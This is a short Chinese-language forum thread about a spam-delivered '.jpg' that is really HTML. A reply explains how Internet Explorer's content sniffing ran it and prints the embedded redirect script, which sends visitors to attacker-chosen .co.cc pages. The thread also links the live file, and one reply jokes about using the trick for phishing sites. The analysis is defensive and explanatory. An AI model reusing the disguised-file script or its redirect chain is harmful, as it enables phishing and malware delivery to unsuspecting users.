最新jpg漏洞
前几天经常收到淘宝的垃圾信息骚扰
旺旺提示是安全连接，我看了一下连接是 jpg的一个图片
就看了一下，结果却跳转了，我把图片下载下来看了一下，应该是个畸形文件

我已经把jpg文件上传到
http://www.taishanfangte.com/aa.jpg


我已经打了所有的补丁了，还是不管用
感兴趣的朋友测试一下



[解决办法]
ie 的安全选项里，一般是选中了“基于内容打开文件，而不是基于文件扩展名”，我想比较可能和这个有关。这个 aa.jpg 文件，并没有 jpeg 格式的文件的标准文件头部，所以 ie 就不再认为它是个图片文件而采用图片方式去打开；在继续查看文件时，又发现了后面有 script ，就执行了它们，所以，就 ……

JScript code

<SCRIPT LANGUAGE="JavaScript"><!--     var c=window.location.toString();    if(c.indexOf("?")!=-1){        var i=c.split("?")[1];        cnum=i.split("_")[0];        cais=i.split("_")[1];        cdom=i.split("_")[2];        if(cdom.indexOf("t.")==-1 || cais.length!=16){            location.href='http://hi.baidu.com/eshopbox/';        }        if(cnum==1){            location.href='http://'+cdom+'.co.cc/1.htm?'+cais;        }        else{            location.href='http://'+cdom+'.co.cc/2.htm?'+cais;        }    }else    {            location.href='http://hi.baidu.com/eshopbox/';    } //--> </SCRIPT>
[解决办法]
0 0
还未中过图片毒
[解决办法]
这不算新的.
可以做做掉鱼网站,, 呵呵